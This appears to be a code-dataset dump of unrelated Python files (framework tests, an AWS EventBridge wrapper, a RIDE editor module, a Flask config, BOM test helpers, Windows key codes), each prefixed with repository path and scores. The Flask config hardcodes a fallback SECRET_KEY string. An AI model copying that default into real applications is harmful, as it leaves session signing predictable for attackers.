self.leaky_relu = nn.LeakyReLU(alpha)
def construct(self, x):
return self.leaky_relu(x)
def test_compile_leaky_relu():
net = NetLeakyReLU(alpha=0.1)
input_data = Tensor(np.array([[1.6, 0, 0.6], [6, 0, -6]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
| 2.03125 | 2 |
sdk/python/tests/integration/feature_repos/universal/data_source_creator.py | marsishandsome/feast | 1 | 16920 | from abc import ABC, abstractmethod
from typing import Dict
import pandas as pd
from feast.data_source import DataSource
from feast.repo_config import FeastConfigBaseModel
class DataSourceCreator(ABC):
@abstractmethod
def create_data_source(
self,
destination: str,
df: pd.DataFrame,
event_timestamp_column="ts",
created_timestamp_column="created_ts",
field_mapping: Dict[str, str] = None,
) -> DataSource:
...
@abstractmethod
def create_offline_store_config(self) -> FeastConfigBaseModel:
...
@abstractmethod
def teardown(self):
...
@abstractmethod
def get_prefixed_table_name(self, name: str, suffix: str) -> str:
...
| 2.65625 | 3 |
tests/interpreter/expression/var_assignment_interpreter_test.py | OtavioHenrique/yalul | 1 | 16921 | from yalul.interpreters.environment import Environment
from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter
from yalul.interpreters.interpreter_errors import InterpreterErrors
class TestVarAssignmentInterpreter:
"""Test var assignment expression interpreter"""
def test_interpreting_var_assignment_without_errors(self):
"""
Validates if VarAssignmentInterpreter is interpreting correctly
"""
error = InterpreterErrors()
env = Environment({}, {})
env.add_variable('Name', 'Gabriela')
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response == 'Otavio'
assert env.get_variable('Name') == 'Otavio'
assert error.errors == []
def test_interpreting_var_assignment_errors(self):
"""
Validates if VarAssignmentInterpreter is generating errors when variable don't exists
"""
error = InterpreterErrors()
env = Environment({}, {})
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response is None
assert error.errors == ['Interpreter Error: Can\'t assign value Otavio to variable named "Name" because it '
'doesn\'t exists']
| 3.1875 | 3 |
backend/externals/events.py | crosspower/naruko | 17 | 16922 | import boto3
from django.conf import settings
from backend.models import CloudWatchEvent
import json
class Events:
def __init__(self):
self.client = boto3.client('events', region_name=settings.NARUKO_REGION)
def list_rules(self):
response = []
for rules in self._list_rules():
response.extend(rules)
return response
def _list_rules(self):
# 最初はTokenなし
response = self.client.list_rules(NamePrefix='NARUKO-')
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
# Tokenがあれば次ページを返す
while token:
response = self.client.list_rules(
NamePrefix='NARUKO-',
NextToken=token
)
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
@staticmethod
def _build_cloudwatchevent(rules: dict):
cloudwatchevents = []
for rule in rules:
cloudwatchevents.append(CloudWatchEvent(
name=rule["Name"],
schedule_expression=rule.get("ScheduleExpression"),
is_active=rule["State"] == "ENABLED"
))
return cloudwatchevents
def save_event(self, event):
# ルール作成
self.client.put_rule(
Name=event.cloudwatchevent.name,
ScheduleExpression=event.cloudwatchevent.schedule_expression,
State="ENABLED" if event.cloudwatchevent.is_active else "DISABLED"
)
# ターゲット作成
target = dict(
Id=event.cloudwatchevent.name,
Arn=settings.EVENT_SNS_TOPIC_ARN,
Input=json.dumps(dict(id=event.event_model.id))
)
self.client.put_targets(
Rule=event.cloudwatchevent.name,
Targets=[target]
)
return event
def delete_event(self, event_name):
# ターゲット削除
self.client.remove_targets(
Rule=event_name,
Ids=[event_name]
)
# ルール削除
self.client.delete_rule(
Name=event_name
)
def describe_event(self, event_name):
response = self.client.describe_rule(
Name=event_name
)
return CloudWatchEvent(
name=response["Name"],
schedule_expression=response["ScheduleExpression"],
is_active=response["State"] == "ENABLED"
)
| 1.828125 | 2 |
1501-1600/1560-Most Visited Sector in a Circular Track/1560-Most Visited Sector in a Circular Track.py | jiadaizhao/LeetCode | 49 | 16923 | <gh_stars>10-100
class Solution:
def mostVisited(self, n: int, rounds: List[int]) -> List[int]:
start, end = rounds[0], rounds[-1]
if end >= start:
return list(range(start, end + 1))
else:
return list(range(1, end + 1)) + list(range(start, n + 1))
| 2.96875 | 3 |
eg/deparse/example.py | KennethBlaney/rivescript-python | 0 | 16924 | #!/usr/bin/env python
# Manipulate sys.path to be able to import converscript from this local git
# repository.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
from converscript import RiveScript
import json
bot = RiveScript()
bot.load_file("example.rive")
dep = bot.deparse()
print(json.dumps(dep, indent=2))
| 1.976563 | 2 |
figuras/PycharmKayStatisticalReport/example_8_11.py | bor9/estudiando_el_kay | 0 | 16925 | <filename>figuras/PycharmKayStatisticalReport/example_8_11.py
import matplotlib.pyplot as plt
import numpy as np
from scipy import signal, linalg
from matplotlib import rc
from matplotlib import rcParams
__author__ = 'ernesto'
# if use latex or mathtext
rc('text', usetex=True)
rcParams['text.latex.preamble'] = [r"\usepackage{amsmath}"]
#respuesta al impulso deseada: sinc
N = 50 # numero par
fc = 0.1
nf = 1024
n = np.arange(-N/2, N/2+1)
N += 1
f = np.arange(nf)/(2 * nf)
# parámetros del filtro a diseñar
p = 10
q = 10
# respuesta al impulso
hd = 2 * fc * np.sinc(2 * fc * n) # * np.hanning(N)
# respuesta en frecuencia
_, Hd = signal.freqz(hd, a=1, worN=nf, whole=False, plot=None)
# estimación de los coeficientes del denominador (a)
# hd = np.arange(N)
x = hd[q + 1:]
H = linalg.toeplitz(hd[q: N - 1], hd[q: q - p: -1])
# a_est = np.linalg.solve(H.T @ H, -H.T @ x)
epsilon = 1e-16
#epsilon = 0
a_est = linalg.solve(H.T @ H + epsilon * np.eye(p), -H.T @ x)
print("Número de Condición 1: {}".format(np.linalg.cond(H.T @ H)))
h = hd[: q + 1]
H0 = linalg.toeplitz(np.concatenate(([0], hd[: q])), np.zeros((p, )))
b_est = h + H0 @ a_est
#print(h)
#print(H0)
# respuesta en frecuencia
a_est = np.concatenate(([1], a_est))
print(a_est)
print(b_est)
_, H_est = signal.freqz(b_est, a_est, worN=nf, whole=False, plot=None)
# respuesta al impulso
delta = np.zeros((N,))
delta[0] = 1
h_est = signal.lfilter(b_est, a_est, delta, axis=- 1, zi=None)
ms = 3
fs = 12
n = np.arange(N)
fig = plt.figure(0, figsize=(9, 5), frameon=False)
ax = plt.subplot2grid((8, 2), (0, 0), rowspan=6, colspan=1)
plt.xlim(0, N-1)
plt.ylim(np.amin(hd)-0.02, np.amax(hd)+0.02)
plt.plot(n, hd, linestyle='-', marker='s', color='k', markersize=ms, lw=1, label='${\\rm deseada}$')
plt.plot(n, h_est, linestyle='-', marker='s', color='r', markersize=ms, lw=1, label='${\\rm estimada}$')
leg = plt.legend(loc=1, frameon=False, fontsize=fs)
ax.set_xticklabels([])
ax.set_ylabel('${\\rm Respuesta\;al\;impulso}$', fontsize=fs)
ax = plt.subplot2grid((8, 2), (6, 0), rowspan=2, colspan=1)
e = hd-h_est
plt.xlim(0, N-1)
plt.ylim(np.amin(e)-0.001, np.amax(e)+0.001)
plt.plot(n, e, linestyle='-', marker='s', color='k', markersize=ms)
ax.set_xlabel(r'$n$', fontsize=fs)
ax.set_ylabel(r'$\epsilon[n]$', fontsize=fs)
ax = plt.subplot2grid((8, 2), (0, 1), rowspan=8, colspan=1)
plt.xlim(0, 0.5)
plt.ylim(-55, 8)
plt.plot(f, 10 * np.log10(np.abs(Hd)), 'k', label='${\\rm deseada}$')
plt.plot(f, 10 * np.log10(np.abs(H_est)), 'r', label='${\\rm estimada}$')
ax.set_xlabel('${\\rm Frecuencia\;normalizada}$', fontsize=fs)
ax.set_ylabel('${\\rm Respuesta\;en\;frecuencia\;(dB)}$', fontsize=fs)
leg = plt.legend(loc=1, frameon=False, fontsize=fs)
plt.savefig('example_8_11.pdf', bbox_inches='tight')
plt.show() | 2.453125 | 2 |
src/robotide/ui/treenodehandlers.py | crylearner/RIDE3X | 1 | 16926 | <gh_stars>1-10
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import wx
from robotide.controller.commands import (
RenameKeywordOccurrences, RemoveMacro, AddKeyword, AddTestCase, RenameTest,
CopyMacroAs, AddVariable, UpdateVariableName, RenameFile,
RenameResourceFile, DeleteFile, SortKeywords, Include, Exclude)
from robotide.controller.settingcontrollers import VariableController
from robotide.controller.macrocontrollers import (
TestCaseController, UserKeywordController)
from robotide.controller.filecontrollers import (
TestDataDirectoryController, ResourceFileController,
TestCaseFileController, ExcludedDirectoryController,
DirtyRobotDataException)
from robotide.editor.editordialogs import (
TestCaseNameDialog, UserKeywordNameDialog, ScalarVariableDialog,
ListVariableDialog, CopyUserKeywordDialog, DictionaryVariableDialog)
from robotide.publish import RideOpenVariableDialog
from robotide.ui.progress import LoadProgressObserver
from robotide.usages.UsageRunner import Usages, ResourceFileUsages
from .filedialogs import (
AddSuiteDialog, AddDirectoryDialog, ChangeFormatDialog, NewResourceDialog,
RobotFilePathDialog)
from robotide.utils import overrides
from robotide.widgets import PopupMenuItems
from .progress import RenameProgressObserver
from .resourcedialogs import ResourceRenameDialog, ResourceDeleteDialog
from robotide.ui.resourcedialogs import FolderDeleteDialog
def action_handler_class(controller):
return {
TestDataDirectoryController: TestDataDirectoryHandler,
ResourceFileController: ResourceFileHandler,
TestCaseFileController: TestCaseFileHandler,
TestCaseController: TestCaseHandler,
UserKeywordController: UserKeywordHandler,
VariableController: VariableHandler,
ExcludedDirectoryController: ExcludedDirectoryHandler
}[controller.__class__]
class _ActionHandler(wx.Window):
is_user_keyword = False
is_test_suite = False
is_variable = False
_label_add_suite = 'New Suite\tCtrl-Shift-F'
_label_add_directory = 'New Directory'
_label_new_test_case = 'New Test Case\tCtrl-Shift-T'
_label_new_user_keyword = 'New User Keyword\tCtrl-Shift-K'
_label_sort_keywords = 'Sort Keywords'
_label_new_scalar = 'New Scalar\tCtrl-Shift-V'
_label_new_list_variable = 'New List Variable\tCtrl-Shift-L'
_label_new_dict_variable = 'New Dictionary Variable'
_label_change_format = 'Change Format'
_label_copy_macro = 'Copy\tCtrl-Shift-C'
_label_rename = 'Rename\tF2'
_label_add_resource = 'Add Resource'
_label_new_resource = 'New Resource'
_label_find_usages = 'Find Usages'
_label_select_all = 'Select All Tests'
_label_deselect_all = 'Deselect All Tests'
_label_select_failed_tests = 'Select Only Failed Tests'
_label_select_passed_tests = 'Select Only Passed Tests'
_label_delete = 'Delete\tCtrl-Shift-D'
_label_delete_no_kbsc = 'Delete'
_label_exclude = 'Exclude'
_label_include = 'Include'
_label_expand_all = 'Expand all'
_label_collapse_all = 'Collapse all'
def __init__(self, controller, tree, node, settings):
wx.Window.__init__(self, tree)
self.controller = controller
self._tree = tree
self._node = node
self._settings = settings
self._rendered = False
self.Show(False)
self._popup_creator = tree._popup_creator
@property
def item(self):
return self.controller.data
@property
def node(self):
return self._node
def show_popup(self):
self._popup_creator.show(self, PopupMenuItems(self, self._actions),
self.controller)
def begin_label_edit(self):
return False
def double_clicked(self):
pass
def end_label_edit(self, event):
pass
def OnDelete(self, event):
pass
def OnNewSuite(self, event):
pass
def OnNewDirectory(self, event):
pass
def OnNewResource(self, event):
pass
def OnNewUserKeyword(self, event):
pass
def OnNewTestCase(self, event):
pass
def OnNewScalar(self, event):
pass
def OnNewListVariable(self, event):
pass
def OnNewDictionaryVariable(self, event):
pass
def OnCopy(self, event):
pass
def OnFindUsages(self, event):
pass
def OnSelectAllTests(self, event):
self._tree.SelectAllTests(self._node)
def OnDeselectAllTests(self, event):
self._tree.DeselectAllTests(self._node)
def OnSelectOnlyFailedTests(self, event):
self._tree.SelectFailedTests(self._node)
def OnSelectOnlyPassedTests(self, event):
self._tree.SelectPassedTests(self._node)
def OnSafeDelete(self, event):
pass
def OnExclude(self, event):
pass
def OnInclude(self, event):
pass
class _CanBeRenamed(object):
def OnRename(self, event):
self._tree.label_editor.OnLabelEdit()
def begin_label_edit(self):
def label_edit():
# FIXME: yep.yep.yep.yep.yep
node = self._tree._controller.find_node_by_controller(
self.controller)
if node:
self._tree.EditLabel(node)
# Must handle pending events before label edit
# This is a fix for situations where there is a pending action
# that will change this label (Text Editor all changing actions)
wx.CallAfter(label_edit)
return True
def end_label_edit(self, event):
if not event.IsEditCancelled():
if self._is_valid_rename(event.GetLabel()):
self.rename(event.GetLabel())
else:
event.Veto()
def _is_valid_rename(self, label):
validation = self.controller.validate_name(label)
if validation.error_message:
self._show_validation_error(validation.error_message)
return False
return True
def _show_validation_error(self, err_msg):
wx.MessageBox(err_msg, 'Validation Error', style=wx.ICON_ERROR)
class DirectoryHandler(_ActionHandler):
is_draggable = False
is_test_suite = False
can_be_rendered = False
_actions = [_ActionHandler._label_new_resource]
def OnNewResource(self, event):
NewResourceDialog(self.controller, self._settings).execute()
class TestDataHandler(_ActionHandler):
accepts_drag = lambda self, dragged: \
(isinstance(dragged, UserKeywordHandler) or
isinstance(dragged, VariableHandler))
is_draggable = False
is_test_suite = True
@property
def tests(self):
return self.controller.tests
@property
def keywords(self):
return self.controller.keywords
@property
def variables(self):
return self.controller.variables
def has_been_modified_on_disk(self):
return self.item.has_been_modified_on_disk()
def do_drop(self, item):
self.controller.add_test_or_keyword(item)
def rename(self, new_name):
return False
def OnSortKeywords(self, event):
"""Sorts the keywords inside the treenode"""
self.controller.execute(SortKeywords())
@property
def can_be_rendered(self):
if not self._has_children():
return False
return not self._rendered
def _has_children(self):
return (self.item.keyword_table or self.item.testcase_table or
self.item.variable_table)
def set_rendered(self):
self._rendered = True
def OnChangeFormat(self, event):
ChangeFormatDialog(self.controller).execute()
def OnNewUserKeyword(self, event):
dlg = UserKeywordNameDialog(self.controller)
if dlg.ShowModal() == wx.ID_OK:
self.controller.execute(AddKeyword(dlg.get_name(), dlg.get_args()))
dlg.Destroy()
def OnNewScalar(self, event):
self._new_var(ScalarVariableDialog)
def OnNewListVariable(self, event):
class FakePlugin(object):
global_settings = self._settings
self._new_var(ListVariableDialog, plugin=FakePlugin())
def OnNewDictionaryVariable(self, event):
class FakePlugin(object):
global_settings = self._settings
self._new_var(DictionaryVariableDialog, plugin=FakePlugin())
def _new_var(self, dialog_class, plugin=None):
dlg = dialog_class(self._var_controller, plugin=plugin)
if dlg.ShowModal() == wx.ID_OK:
name, value = dlg.get_value()
comment = dlg.get_comment()
self.controller.execute(AddVariable(name, value, comment))
@property
def _var_controller(self):
return self.controller.datafile_controller.variables
class TestDataDirectoryHandler(TestDataHandler):
def __init__(self, *args):
TestDataHandler.__init__(self, *args)
self._actions = [
_ActionHandler._label_add_suite,
_ActionHandler._label_add_directory,
_ActionHandler._label_new_resource,
'---',
_ActionHandler._label_new_user_keyword,
_ActionHandler._label_new_scalar,
_ActionHandler._label_new_list_variable,
_ActionHandler._label_new_dict_variable,
'---',
_ActionHandler._label_change_format
]
if self.controller.parent:
self._actions.extend([_ActionHandler._label_delete_no_kbsc])
self._actions.extend([
'---',
_ActionHandler._label_select_all,
_ActionHandler._label_deselect_all,
_ActionHandler._label_select_failed_tests,
_ActionHandler._label_select_passed_tests
])
if self.controller.parent:
self._actions.extend(['---',
_ActionHandler._label_exclude])
self._actions.extend(['---',
_ActionHandler._label_expand_all,
_ActionHandler._label_collapse_all])
def OnExpandAll(self, event):
self._tree.ExpandAllSubNodes(self._node)
def OnCollapseAll(self, event):
self._tree.CollapseAllSubNodes(self._node)
def OnNewSuite(self, event):
AddSuiteDialog(self.controller, self._settings).execute()
def OnNewDirectory(self, event):
AddDirectoryDialog(self.controller, self._settings).execute()
def OnNewResource(self, event):
NewResourceDialog(self.controller, self._settings).execute()
def OnDelete(self, event):
FolderDeleteDialog(self.controller).execute()
def OnExclude(self, event):
try:
self.controller.execute(Exclude())
except DirtyRobotDataException:
wx.MessageBox('Directory contains unsaved data!\n'
'You must save data before excluding.')
class _FileHandlerThanCanBeRenamed(_CanBeRenamed):
@overrides(_CanBeRenamed)
def begin_label_edit(self):
self._old_label = self._node.GetText()
self._set_node_label(self.controller.basename)
return _CanBeRenamed.begin_label_edit(self)
@overrides(_CanBeRenamed)
def end_label_edit(self, event):
if not event.IsEditCancelled():
result = self.controller.execute(
self._rename_command(event.GetLabel()))
if result:
self._rename_ok_handler()
self._old_label = self.controller.basename
else:
event.Veto()
else:
self._set_node_label(self._old_label)
def _rename_ok_handler(self):
pass
def _rename_command(self, label):
raise NotImplementedError(self.__class__)
def _set_node_label(self, label):
self._tree.SetItemText(self._node, label)
class ResourceFileHandler(_FileHandlerThanCanBeRenamed, TestDataHandler):
is_test_suite = False
_actions = [_ActionHandler._label_new_user_keyword,
_ActionHandler._label_new_scalar,
_ActionHandler._label_new_list_variable,
_ActionHandler._label_new_dict_variable,
'---',
_ActionHandler._label_rename,
_ActionHandler._label_change_format,
_ActionHandler._label_sort_keywords,
_ActionHandler._label_find_usages,
_ActionHandler._label_delete]
def OnFindUsages(self, event):
ResourceFileUsages(self.controller, self._tree.highlight).show()
def OnDelete(self, event):
ResourceDeleteDialog(self.controller).execute()
def OnSafeDelete(self, event):
return self.OnDelete(event)
@overrides(_FileHandlerThanCanBeRenamed)
def _rename_command(self, label):
return RenameResourceFile(
label, self._check_should_rename_static_imports)
def _check_should_rename_static_imports(self):
return ResourceRenameDialog(self.controller).execute()
class TestCaseFileHandler(_FileHandlerThanCanBeRenamed, TestDataHandler):
accepts_drag = lambda *args: True
_actions = [_ActionHandler._label_new_test_case,
_ActionHandler._label_new_user_keyword,
_ActionHandler._label_new_scalar,
_ActionHandler._label_new_list_variable,
_ActionHandler._label_new_dict_variable,
'---',
_ActionHandler._label_rename,
_ActionHandler._label_change_format,
_ActionHandler._label_sort_keywords,
_ActionHandler._label_delete,
'---',
_ActionHandler._label_select_all,
_ActionHandler._label_deselect_all,
_ActionHandler._label_select_failed_tests,
_ActionHandler._label_select_passed_tests
]
def OnNewTestCase(self, event):
dlg = TestCaseNameDialog(self.controller)
if dlg.ShowModal() == wx.ID_OK:
self.controller.execute(AddTestCase(dlg.get_name()))
dlg.Destroy()
def OnDelete(self, event):
if wx.MessageBox('Delete test case file', caption='Confirm',
style=wx.YES_NO | wx.ICON_QUESTION) == wx.YES:
self.controller.execute(DeleteFile())
def OnSafeDelete(self, event):
return self.OnDelete(event)
@overrides(_FileHandlerThanCanBeRenamed)
def _rename_command(self, label):
return RenameFile(label)
@overrides(_FileHandlerThanCanBeRenamed)
def _rename_ok_handler(self):
self._tree.DeselectAllTests(self._node)
class _TestOrUserKeywordHandler(_CanBeRenamed, _ActionHandler):
accepts_drag = lambda *args: False
is_draggable = True
_actions = [
_ActionHandler._label_copy_macro, 'Move Up\tCtrl-Up',
'Move Down\tCtrl-Down', _ActionHandler._label_rename, '---', 'Delete'
]
def remove(self):
self.controller.delete()
def rename(self, new_name):
self.controller.execute(self._create_rename_command(new_name))
def OnCopy(self, event):
dlg = self._copy_name_dialog_class(self.controller, self.item)
if dlg.ShowModal() == wx.ID_OK:
self.controller.execute(CopyMacroAs(dlg.get_name()))
dlg.Destroy()
def OnMoveUp(self, event):
if self.controller.move_up():
self._tree.move_up(self._node)
def OnMoveDown(self, event):
if self.controller.move_down():
self._tree.move_down(self._node)
def OnDelete(self, event):
self.controller.execute(RemoveMacro(self.controller))
class TestCaseHandler(_TestOrUserKeywordHandler):
_datalist = property(lambda self: self.item.datalist)
_copy_name_dialog_class = TestCaseNameDialog
def _add_copy_to_tree(self, parent_node, copied):
self._tree.add_test(parent_node, copied)
def _create_rename_command(self, new_name):
return RenameTest(new_name)
class UserKeywordHandler(_TestOrUserKeywordHandler):
is_user_keyword = True
_datalist = property(lambda self: self.item.datalist)
_copy_name_dialog_class = CopyUserKeywordDialog
_actions = _TestOrUserKeywordHandler._actions + [
_ActionHandler._label_find_usages]
def _add_copy_to_tree(self, parent_node, copied):
self._tree.add_keyword(parent_node, copied)
def _create_rename_command(self, new_name):
return RenameKeywordOccurrences(
self.controller.name, new_name,
RenameProgressObserver(self.GetParent().GetParent()),
self.controller.info)
def OnFindUsages(self, event):
Usages(self.controller, self._tree.highlight).show()
class VariableHandler(_CanBeRenamed, _ActionHandler):
accepts_drag = lambda *args: False
is_draggable = True
is_variable = True
OnMoveUp = OnMoveDown = lambda *args: None
_actions = [_ActionHandler._label_rename, 'Delete']
@overrides(_ActionHandler)
def double_clicked(self):
RideOpenVariableDialog(controller=self.controller).publish()
def OnDelete(self, event):
self.remove()
def remove(self):
self.controller.delete()
def rename(self, new_name):
self.controller.execute(UpdateVariableName(new_name))
@property
def index(self):
return self.controller.index
class ResourceRootHandler(_ActionHandler):
can_be_rendered = is_draggable = is_user_keyword = is_test_suite = False
rename = lambda self, new_name: False
accepts_drag = lambda self, dragged: False
_actions = [_ActionHandler._label_add_resource]
@property
def item(self):
return None
def OnAddResource(self, event):
path = RobotFilePathDialog(
self, self.controller, self._settings).execute()
if path:
self.controller.load_resource(path, LoadProgressObserver(self))
class ExcludedDirectoryHandler(TestDataDirectoryHandler):
is_draggable = False
is_test_suite = True
def __init__(self, *args):
TestDataHandler.__init__(self, *args)
self._actions = [_ActionHandler._label_include]
def OnInclude(self, event):
self.controller.execute(Include())
| 1.359375 | 1 |
config.py | rajatomar788/pyblog | 0 | 16927 | <filename>config.py
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'rajatomar788'
if os.environ.get('DATABASE_URL') is None:
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
elif os.environ.get('EXTRA_DATABASE') is not None:
SQLALCHEMY_DATABASE_URI = os.environ['EXTRA_DATABASE']
else:
SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAX_SEARCH_RESULTS = 50
POSTS_PER_PAGE = 20
basedir = basedir
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
MAX_CONTENT_PATH = 16*1024*1024
#mail server settings
MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USERNAME = 'Raja'
MAIL_PASSWORD = '<PASSWORD>'
#administrator list
ADMINS = ['<EMAIL>']
| 2.078125 | 2 |
ceefax/fonts/size7extracondensed/__init__.py | mscroggs/CEEFAX | 1 | 16928 | from .default import size7extracondensedfont
| 1.117188 | 1 |
bom/helpers.py | gxyp/indabom | 0 | 16929 | <reponame>gxyp/indabom<gh_stars>0
from bom.octopart_parts_match import match_part
from bom.models import Part, PartClass, Seller, SellerPart, Subpart, \
Manufacturer, Organization, PartFile
def create_a_fake_organization(user, free=False):
org = Organization(
name="Atlas",
subscription='F' if free else 'P',
owner=user)
org.save()
return org
def create_some_fake_part_classes():
pc1 = PartClass(code=500, name='Wendy', comment='Mechanical Switches')
pc1.save()
pc2 = PartClass(code=200, name='Archibald', comment='')
pc2.save()
pc3 = PartClass(code=503, name='Ghost', comment='Like Kasper')
pc3.save()
return pc1, pc2, pc3
def create_a_fake_subpart(assembly_part, assembly_subpart, count=4):
sp1 = Subpart(
assembly_part=assembly_part,
assembly_subpart=assembly_subpart,
count=count)
sp1.save()
return sp1
def create_some_fake_sellers(organization):
s1 = Seller(name='Mouser', organization=organization)
s1.save()
s2 = Seller(name='Digi-Key', organization=organization)
s2.save()
s3 = Seller(name='Archibald', organization=organization)
s3.save()
return s1, s2, s3
def create_some_fake_manufacturers(organization):
m1 = Manufacturer(name='STMicroelectronics', organization=organization)
m1.save()
m2 = Manufacturer(name='Nordic Semiconductor', organization=organization)
m2.save()
m3 = Manufacturer(name='Murata', organization=organization)
m3.save()
return m1, m2, m3
def create_a_fake_seller_part(
seller,
part,
moq,
mpq,
unit_cost,
lead_time_days):
sp1 = SellerPart(
seller=seller,
part=part,
minimum_order_quantity=moq,
minimum_pack_quantity=mpq,
unit_cost=unit_cost,
lead_time_days=lead_time_days)
sp1.save()
return sp1
def create_some_fake_parts(organization):
(pc1, pc2, pc3) = create_some_fake_part_classes()
(m1, m2, m3) = create_some_fake_manufacturers(organization=organization)
pt1 = Part(
manufacturer_part_number='STM32F401CEU6',
number_class=pc2,
number_item='3333',
description='Brown dog',
revision='1',
manufacturer=m1,
organization=organization)
pt1.save()
pt2 = Part(
manufacturer_part_number='GRM1555C1H100JA01D',
number_class=pc1,
description='',
manufacturer=None,
organization=organization)
pt2.save()
pt3 = Part(
manufacturer_part_number='NRF51822',
number_class=pc3,
description='Friendly ghost',
manufacturer=m3,
organization=organization)
pt3.save()
create_a_fake_subpart(pt1, pt2)
create_a_fake_subpart(pt1, pt3, count=10)
(s1, s2, s3) = create_some_fake_sellers(organization=organization)
create_a_fake_seller_part(
s1,
pt1,
moq=None,
mpq=None,
unit_cost=None,
lead_time_days=None)
create_a_fake_seller_part(
s2,
pt1,
moq=1000,
mpq=5000,
unit_cost=0.1005,
lead_time_days=7)
create_a_fake_seller_part(
s2,
pt2,
moq=200,
mpq=200,
unit_cost=0,
lead_time_days=47)
return pt1, pt2, pt3
def create_a_fake_partfile(file, part):
pf1 = PartFile(file=None, part=part)
pf1.save()
return pf1
| 2.25 | 2 |
keycodes/key/codes/win.py | jonchun/ptoys-mapper | 0 | 16930 | <filename>keycodes/key/codes/win.py<gh_stars>0
# Source:
# https://github.com/tpn/winsdk-10/blob/46c66795f49679eb4783377968ce25f6c778285a/Include/10.0.10240.0/um/WinUser.h
# # convert all C-style comments to python multi-line string comment
# find: (^/\*[\s\S\r]+?\*/)
# replace: """\n$1\n"""
# # convert all keycode #defines to be python constants
# find: #define\s(.+_.+?)\s+([\w]+)(\s*)(/[/*].+)?
# replace: $1 = $2$3# $4\n
# # clean up results by removing lines with only a single # caused by previous regex
# find: ^# $\n
# replace:
# # clean up duplicate newlines
# find: (\s#.+\n)\n
# replace: $1
# # clean up multi-line comments.
# find: ^(\s{3,})(\S.+)
# replace: $1 # $2
from enum import IntEnum
class WinCodes(IntEnum):
"""
/*
* Virtual Keys, Standard Set
*/
"""
VK_LBUTTON = 0x01
VK_RBUTTON = 0x02
VK_CANCEL = 0x03
VK_MBUTTON = 0x04 # /* NOT contiguous with L & RBUTTON */
# if(_WIN32_WINNT >= 0x0500)
VK_XBUTTON1 = 0x05 # /* NOT contiguous with L & RBUTTON */
VK_XBUTTON2 = 0x06 # /* NOT contiguous with L & RBUTTON */
# endif /* _WIN32_WINNT >= 0x0500 */
"""
/*
* 0x07 : reserved
*/
"""
VK_BACK = 0x08
VK_TAB = 0x09
"""
/*
* 0x0A - 0x0B : reserved
*/
"""
VK_CLEAR = 0x0C
VK_RETURN = 0x0D
"""
/*
* 0x0E - 0x0F : unassigned
*/
"""
VK_SHIFT = 0x10
VK_CONTROL = 0x11
VK_MENU = 0x12
VK_PAUSE = 0x13
VK_CAPITAL = 0x14
VK_KANA = 0x15
VK_HANGEUL = 0x15 # /* old name - should be here for compatibility */
VK_HANGUL = 0x15
"""
/*
* 0x16 : unassigned
*/
"""
VK_JUNJA = 0x17
VK_FINAL = 0x18
VK_HANJA = 0x19
VK_KANJI = 0x19
"""
/*
* 0x1A : unassigned
*/
"""
VK_ESCAPE = 0x1B
VK_CONVERT = 0x1C
VK_NONCONVERT = 0x1D
VK_ACCEPT = 0x1E
VK_MODECHANGE = 0x1F
VK_SPACE = 0x20
VK_PRIOR = 0x21
VK_NEXT = 0x22
VK_END = 0x23
VK_HOME = 0x24
VK_LEFT = 0x25
VK_UP = 0x26
VK_RIGHT = 0x27
VK_DOWN = 0x28
VK_SELECT = 0x29
VK_PRINT = 0x2A
VK_EXECUTE = 0x2B
VK_SNAPSHOT = 0x2C
VK_INSERT = 0x2D
VK_DELETE = 0x2E
VK_HELP = 0x2F
"""
/*
* VK_0 - VK_9 are the same as ASCII '0' - '9' (0x30 - 0x39)
* 0x3A - 0x40 : unassigned
* VK_A - VK_Z are the same as ASCII 'A' - 'Z' (0x41 - 0x5A)
*/
"""
VK_0 = 0x30
VK_1 = 0x31
VK_2 = 0x32
VK_3 = 0x33
VK_4 = 0x34
VK_5 = 0x35
VK_6 = 0x36
VK_7 = 0x37
VK_8 = 0x38
VK_9 = 0x39
VK_A = 0x41
VK_B = 0x42
VK_C = 0x43
VK_D = 0x44
VK_E = 0x45
VK_F = 0x46
VK_G = 0x47
VK_H = 0x48
VK_I = 0x49
VK_J = 0x4A
VK_K = 0x4B
VK_L = 0x4C
VK_M = 0x4D
VK_N = 0x4E
VK_O = 0x4F
VK_P = 0x50
VK_Q = 0x51
VK_R = 0x52
VK_S = 0x53
VK_T = 0x54
VK_U = 0x55
VK_V = 0x56
VK_W = 0x57
VK_X = 0x58
VK_Y = 0x59
VK_Z = 0x5A
VK_LWIN = 0x5B
VK_RWIN = 0x5C
VK_APPS = 0x5D
"""
/*
* 0x5E : reserved
*/
"""
VK_SLEEP = 0x5F
VK_NUMPAD0 = 0x60
VK_NUMPAD1 = 0x61
VK_NUMPAD2 = 0x62
VK_NUMPAD3 = 0x63
VK_NUMPAD4 = 0x64
VK_NUMPAD5 = 0x65
VK_NUMPAD6 = 0x66
VK_NUMPAD7 = 0x67
VK_NUMPAD8 = 0x68
VK_NUMPAD9 = 0x69
VK_MULTIPLY = 0x6A
VK_ADD = 0x6B
VK_SEPARATOR = 0x6C
VK_SUBTRACT = 0x6D
VK_DECIMAL = 0x6E
VK_DIVIDE = 0x6F
VK_F1 = 0x70
VK_F2 = 0x71
